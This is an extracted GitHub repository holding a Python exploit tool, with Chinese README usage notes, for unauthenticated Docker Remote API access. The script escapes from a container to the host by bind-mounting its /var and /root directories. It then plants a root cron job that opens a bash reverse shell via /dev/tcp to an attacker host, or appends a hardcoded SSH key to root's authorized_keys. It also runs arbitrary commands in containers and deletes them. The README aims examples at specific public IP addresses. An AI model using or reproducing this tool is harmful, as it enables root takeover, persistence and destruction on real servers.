Repository: Tycx2ry/docker_api_vul
Branch: master
Commit: 77d5ce794218
Files: 3
Total size: 8.3 KB
Directory structure:
gitextract_napcga5_/
├── README.md
├── dockerRemoteApiGetRootShell.py
└── requirements.txt
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# docker_api_vul
docker 未授权访问漏洞利用脚本
##安装类库
pip install -r requirements.txt
##查看运行的容器
python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375
##查看所有的容器
python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375 -a
##查看所有镜像
python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375 -l
##查看端口映射
python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375 -L
##写计划任务(centos,redhat等,加-u参数用于ubuntu等)
python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -C -i 镜像名 -H 反弹ip -P 反弹端口
python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -C -u -i 镜像名 -H 反弹ip -P 反弹端口
##写sshkey(自行修改脚本的中公钥)
python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -C -i 镜像名 -k
##在容器中执行命令
python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -e "id" -I 容器id
##删除容器
python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -c -I 容器id
##修改client api版本
python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -v 1.22
##查看服务端api版本
python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -V
================================================
FILE: dockerRemoteApiGetRootShell.py
================================================
#-*- coding:utf-8 -*-
#author:L.N.@insight-labs.org
import urllib2
import urllib
import json
import sys
import getopt
from docker import Client
def http_get(url):
response = urllib2.urlopen(url)
return response.read()
def http_post(url, values):
jdata = values
#print url
#print jdata
send_headers = {
'Content-Type':'application/json'
}
req = urllib2.Request(url, data=jdata,headers=send_headers)
response = urllib2.urlopen(req)
return response.read()
def isset(v):
try :
type(eval(v))
except:
return 0
else:
return 1
def printport(portsList, name):
if isset("portsList['IP']") == 0:
portsList['IP']="*"
printport(portsList,name)
elif isset("portsList['Type']") == 0:
portsList['Type']="*"
printport(portsList,name)
elif isset("portsList['PublicPort']") == 0:
portsList['PublicPort']="*"
printport(portsList,name)
elif isset("portsList['PrivatePort']") == 0:
portsList['PrivatePort']="*"
printport(portsList,name)
else:
print "[-]"+name+"[+]"+portsList['Type']+"[-]"+portsList['IP']+":"+str(portsList['PrivatePort'])+" --> "+host+":"+str(portsList['PublicPort'])
def createClient(host,port,version):
clientApiVersion = getversion(host,port,version)
print "[-]ClientApiVersion:"+clientApiVersion
cli = Client(base_url='tcp://'+host+':'+port,version=clientApiVersion)
return cli
def getversion(host,port,version):
url = "http://"+host+":"+port+"/version"
ret = json.loads(http_get(url))
if version != '':
clientApiVersion = version
else:
clientApiVersion = ret['ApiVersion']
return clientApiVersion
def printContainer(host,port,version,allContainer):
cli = createClient(host,port,version)
if allContainer == 1:
ret = cli.containers(all=True)
else:
ret = cli.containers()
for info in ret:
print "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]"
print "[-] id: "+info['Id']
print "[-] Names: "+info['Names'][0]
print "[-] Image: "+info['Image']
print "[-] Status: "+info['Status']
print "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]"
if __name__ == "__main__":
opts, args = getopt.getopt(sys.argv[1:], "v:kauVCcsLli:e:h:p:H:P:I:")
key = 0
version =''
payload =''
sshkey = 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCoecC7vmWn4s2y4T+Pc3bJ0owDYWzGIBTCWWonN4qMTCbe66hKopgtUuHC1y5H3HFQ0qsni0vFAGSoO4TLiIpvHUXbf9Wi9vR2q4oYphH9Kgsd3cVXsHUFcgybwdk5DCXpmoSJTlEoOrtWajYdyuALMy+CqpkwWDj+uTz+9/2P3T0Nh5F+U+UZOgSqIi5xQfUGJKGoFGXwvpqEL6UnGG4bbgGxVa5mJZVH0cxwKK6w7luezkcRVBEJ1SZAkjZOmZojyJbYQolItcBNBsXQ+cakjg3DeU69wrDiBdP+k2i2k3uzhJqJXfxLdxUZfjgXHwSOzDb2D5+841trASAwZAy1Gq4uwkbmwupe/qTPK2R31d5h4Jqx4N19eUjT8GkkDj+mnJTwYyOPJH/ghEvn4UfNOtohM2lZPbskvvskn82g0WzYJ5JnQaKfup1IYLTraBbJ5UdVYsCfG5ddRZF4xMab2ZDgcdqyISJxHPK9/P7w7mmgSut1nK5R1+HLSl/xDAPcoVd0H3ePqxN9ZD0BoMjY8fPxKAQR+bB5M05iDIIwUxhj2NQvCpwxxGwJXUSf13zirXRZhkZGnWrkNrzqHzpLZqoEBCEORErmFAvsI8yIBvThSylReiwhAWkdL7ONQ4dd7UgsQfY/0MMfxd8/V+041I1sIVUVBnHYUUwqE0eZ9Q== wanniba@wanniba.com'
for op, value in opts:
if op =="-l":
imagesList = 1
elif op == "-i":
imageName = value
elif op == "-e":
dataExec = value
elif op == "-h":
host = value
elif op =='-p':
port = value
elif op == '-L':
portList = 1
elif op == '-H':
lhsot = value
elif op == '-P':
lport = value
elif op =='-C':
createContainer = 1
elif op == '-v':
version = value
elif op == '-V':
version = 1
elif op == '-c':
closeContainer = 1
elif op == '-I':
imageId = value
elif op == '-a':
allContainer = 1
elif op == '-s':
startContainer = 1
elif op == '-k':
key = 1
elif op == '-u':
isUbuntu = 1
if isset('lhsot') and isset('lport'):
if isset('isUbuntu'):
payload = '/bin/bash -c "echo \\\"*/1 * * * * /bin/bash -i >& /dev/tcp/'+lhsot+'/'+lport+' 0>&1\\\" >> /tmp/spool/cron/crontabs/root"' #chmod 600
else:
payload = '/bin/bash -c "echo \\\"*/1 * * * * /bin/bash -i >& /dev/tcp/'+lhsot+'/'+lport+' 0>&1\\\" >> /tmp/spool/cron/root"' #centos,redhat and so on
print "[-]Paylaod: "+payload
if sshkey !='' and key == 1:
payload = '/bin/bash -c "echo \\\"'+sshkey+'\\\" >> /tmp1/.ssh/authorized_keys"'
print "[-]Paylaod: "+payload
if isset('host') and isset('port'):
if isset('version') and version == 1:
url = "http://"+host+":"+port+"/version"
ret = json.loads(http_get(url))
print "[-] ApiVersion: "+ret['ApiVersion']
elif isset('imagesList'):
url = "http://"+host+":"+port+"/images/json"
ret = json.loads(http_get(url))
for info in ret:
print "RepoTags: "+info['RepoTags'][0]
elif isset('createContainer') and isset('imageName'):
cli = createClient(host,port,version)
container = cli.create_container(image=imageName, command='/bin/bash', tty=True, volumes=['/tmp','/tmp1'], host_config=cli.create_host_config(binds=['/var:/tmp:rw','/root:/tmp1:rw']))
print "[-]Container ID:"+container['Id']
print "[-]Warning:"+str(container['Warnings'])
response = cli.start(container=container.get('Id'))
if isset('isUbuntu'):
cli.exec_start(exec_id=cli.exec_create(container=container.get('Id'), cmd=payload))
print "[-]create crontabs ......"
cli.exec_start(exec_id=cli.exec_create(container=container.get('Id'), cmd='chmod 600 /tmp/spool/cron/crontabs/root'))
print "[-]chmod 600 ......"
else:
print cli.exec_start(exec_id=cli.exec_create(container=container.get('Id'), cmd=payload))
print "[-]create crontabs ......"
elif isset('closeContainer') and isset('imageId'):
cli = createClient(host,port,version)
cli.stop(container=imageId)
cli.remove_container(container=imageId)
elif isset('startContainer') and isset('imageId'):
cli = createClient(host,port,version)
cli.start(container=imageId)
elif isset('dataExec') and isset('imageId'):
cli = createClient(host,port,version)
print "[-]Command:"+dataExec
print cli.exec_start(exec_id=cli.exec_create(container=imageId, cmd=dataExec))
elif isset('portList'):
url = "http://"+host+":"+port+"/containers/json"
ret = json.loads(http_get(url))
for pl in ret:
if isset("pl['Names'][0]"):
name = pl['Names'][0]
else:
name = '*'
for portsList in pl['Ports']:
printport(portsList, name)
else:
if isset('allContainer'):
printContainer(host,port,version,allContainer)
else:
printContainer(host,port,version,0)
================================================
FILE: requirements.txt
================================================
docker-py == 1.8.1
gitextract_napcga5_/ ├── README.md ├── dockerRemoteApiGetRootShell.py └── requirements.txt
SYMBOL INDEX (7 symbols across 1 files) FILE: dockerRemoteApiGetRootShell.py function http_get (line 12) | def http_get(url): function http_post (line 16) | def http_post(url, values): function isset (line 27) | def isset(v): function printport (line 35) | def printport(portsList, name): function createClient (line 51) | def createClient(host,port,version): function getversion (line 57) | def getversion(host,port,version): function printContainer (line 66) | def printContainer(host,port,version,allContainer):
Condensed preview — 3 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (9K chars).
[
{
"path": "README.md",
"chars": 1112,
"preview": "# docker_api_vul\ndocker 未授权访问漏洞利用脚本\n\n##安装类库\n\n pip install -r requirements.txt\n\n##查看运行的容器\n\n python dockerRemoteApiG"
},
{
"path": "dockerRemoteApiGetRootShell.py",
"chars": 7374,
"preview": "#-*- coding:utf-8 -*-\n#author:L.N.@insight-labs.org\n\n\nimport urllib2\nimport urllib\nimport json\nimport sys\nimport getopt\n"
},
{
"path": "requirements.txt",
"chars": 19,
"preview": "docker-py == 1.8.1\n"
}
]
About this extraction
This page contains the full source code of the Tycx2ry/docker_api_vul GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 3 files (8.3 KB), approximately 2.8k tokens, and a symbol index with 7 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.